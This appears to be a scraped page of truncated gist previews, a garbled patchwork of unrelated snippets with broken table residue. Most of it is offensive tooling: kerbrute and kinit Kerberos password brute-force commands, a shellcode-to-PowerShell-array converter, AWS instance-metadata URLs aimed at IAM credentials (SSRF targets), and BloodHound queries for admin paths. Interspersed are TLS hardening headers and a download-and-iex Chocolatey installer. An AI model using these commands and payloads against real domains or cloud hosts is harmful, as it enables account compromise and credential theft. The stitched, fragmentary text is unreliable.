With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# | |
# Name: nginx-tls.conf | |
# Auth: Gavin Lloyd <gavinhungry@gmail.com> | |
# Desc: Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating | |
# | |
# Enables HTTP/2, PFS, HSTS and OCSP stapling. Configuration options not related | |
# to SSL/TLS are not included here. | |
# | |
# Additional tips: | |
# |
import sys | |
ps_shellcode = '@(' | |
with open(sys.argv[1], 'rb') as shellcode: | |
byte = shellcode.read(1) | |
while byte != '': | |
ps_shellcode += '0x{}, '.format(byte.encode('hex')) | |
byte = shellcode.read(1) |
#!/usr/bin/python | |
# Disasm of 64-bit binary: | |
# $ objdump -b binary -D -m i386:x86-64 <file> | |
# | |
# Usage: | |
# $ ./bin2shellcode.py <file> num | |
# Where: | |
# num - number of bytes to convert into array. | |
# `num` can be negative, resulting in `size-num` | |
# bytes be converted. |
# Copyright 2019, Alexander Hass | |
# https://www.hass.de/content/setup-microsoft-windows-or-iis-ssl-perfect-forward-secrecy-and-tls-12 | |
# | |
# After running this script the computer only supports: | |
# - TLS 1.2 | |
# | |
# Version 3.0.1, see CHANGELOG.txt for changes. | |
Write-Host 'Configuring IIS with SSL/TLS Deployment Best Practices...' | |
Write-Host '--------------------------------------------------------------------------------' |
#!/bin/bash | |
# Title: kinit_brute.sh | |
# Author: @ropnop | |
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
# The script configures the realm and KDC for you based on the domain provided and the domain controller | |
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
# Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |
:: Download this and execute as admin | |
:: Install choco .exe and add choco to PATH | |
@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin" | |
choco feature enable -n allowGlobalConfirmation | |
:: Just install node stuff manually. Trust me. | |
:: choco install nodejs-lts --install-directory='C:\nodejs' -fy | |
:: npm install -g gulp cordova@6.5.0 ionic@2.2.3 bower |
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
<# |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
RETURN u.name | |
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
--------------- | |
MATCH | |
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) | |
WITH | |
U.name as n, |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module: